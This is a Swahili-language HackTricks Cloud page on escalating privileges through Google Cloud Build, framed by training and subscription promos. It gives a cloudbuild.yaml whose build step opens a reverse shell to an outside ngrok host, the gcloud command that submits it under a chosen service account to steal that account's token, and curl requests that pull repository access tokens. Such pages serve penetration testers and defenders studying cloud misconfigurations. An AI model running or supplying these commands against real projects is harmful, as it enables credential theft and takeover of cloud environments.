GCP - Cloudbuild Privesc

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

cloudbuild

Kwa taarifa zaidi kuhusu Cloud Build angalia:

GCP - Cloud Build Enum

`cloudbuild.builds.create`, `iam.serviceAccounts.actAs`

Kwa ruhusa hii unaweza kuwasilisha cloud build. Mashine ya cloudbuild itakuwa kwenye filesystem yake kwa chaguo-msingi token ya cloudbuild Service Account: <PROJECT_NUMBER>@cloudbuild.gserviceaccount.com. Hata hivyo, unaweza taja service account yoyote ndani ya project katika configuration ya cloudbuild.
Kwa hivyo, unaweza kufanya mashine i-exfiltrate token kwa server yako au kupata reverse shell ndani yake na kupata token yenyewe (faili inayoshikilia token inaweza kubadilika).

Direct exploitation via gcloud CLI

1- Tengeneza cloudbuild.yaml na uibadilishe na data ya listener yako

Usanidi wa Cloud Build YAML kwa reverse shell

```yaml steps: - name: bash script: | #!/usr/bin/env bash bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 options: logging: CLOUD_LOGGING_ONLY ```

2- Pakia build rahisi bila chanzo, faili ya yaml na taja SA itakayotumika kwenye build:

Tuma Cloud Build kwa service account iliyotajwa

```bash gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com ```

Kutumia python gcloud library

Unaweza kupata script ya asili ya exploit hapa kwenye GitHub (lakini eneo inachochukua token halikufanya kazi kwangu). Kwa hivyo, angalia script ya ku-automate kuunda, exploit na kusafisha mazingira ya udhaifu hapa na script ya python kupata reverse shell ndani ya mashine ya cloudbuild na kuiba hapa (katika msimbo unaweza kuona jinsi ya kubainisha service accounts nyingine).

Kwa maelezo ya kina, tembelea https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/

`cloudbuild.repositories.accessReadToken`

Kwa ruhusa hii mtumiaji anaweza kupata read access token inayotumika kufikia repository:

Pata read access token ya repository

```bash curl -X POST \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ -d '{}' \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections//repositories/:accessReadToken" ```

`cloudbuild.repositories.accessReadWriteToken`

Kwa ruhusa hii mtumiaji anaweza kupata tokeni ya upatikanaji ya kusoma na kuandika inayotumika kufikia repository:

Pata tokeni ya upatikanaji ya kusoma na kuandika kwa repository

Kwa ruhusa hii unaweza kupata repos ambazo connection ina ufikiaji wa:

Pata repositories zinazoweza kuunganishwa

```bash curl -X GET \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://cloudbuild.googleapis.com/v2/projects//locations//connections/:fetchLinkableRepositories" ```

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

HackTricks Cloud